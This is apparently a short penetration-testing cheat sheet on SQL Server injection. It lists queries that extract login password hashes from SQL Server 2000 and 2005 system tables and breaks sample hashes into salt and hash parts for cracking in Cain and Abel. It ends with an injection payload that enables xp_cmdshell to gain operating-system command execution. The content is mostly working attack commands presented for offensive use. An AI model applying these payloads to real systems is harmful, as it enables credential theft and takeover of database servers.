SQL Server Injection: Commands Update

Stealing password hashes:know the table to use

SQL SERVER 2012 http://msdn.microsoft.com/en-us/library/ms187997.aspx and http://msdn.microsoft.com/en-us/library/ms179871.aspx

NO VERSION http://msdn.microsoft.com/en-us/library/ms179503.aspx
SQL SERVER 2000 "Select Password from SysxLogins Where Name = 'XXXX'" Where XXXX is the user

SQL SERVER 2000 "select name,password FROM master.dbo.sysxlogins

SQL SERVER 2005 select password_hash FROM sys.sql_logins

(ref pg 194 of the book "SQL INJECTION attacks and defence")

SQL SERVER 2005: There is no sysxlogins table in SQL 2005. In SQL 2000 also, it was undocumented. You can try using either of the following catalog views:

1. Sys.Server_Principals
2. Sys.sql_logins

http://www.subhashdasyam.com/2011/04/database-password-hashes-cracking.html

SQL Server 2000:-

SELECT password from master.dbo.sysxlogins where name='sa'

0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503412FD54D6119FFF04129A1D72E7C3194F7284A7F3A

0×0100- constant header

34767D5C- salt

0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash

2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash

crack the upper case hash in 'cain and abel' and then work the case sentive hash

SQL server 2005:-

SELECT password_hash FROM sys.sql_logins where name='sa'

0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F

0×0100- constant header

993BF231-salt

5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash

crack case sensitive hash in cain, try brute force and dictionary based attacks.

update:- following bernardo's comments:-

use function fn_varbintohexstr() to cast password in a hex string.

e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password_hash) from sysxlogins

Input:
*Depends on privileges of SQL user


'; EXEC master.dbo.sp_configure 'show advanced options', 1; RECONFIGURE; EXEC master.dbo.sp_configure 'xp_cmdshell', 1; RECONFIGURE;--

Positive Response:


No error

Nexus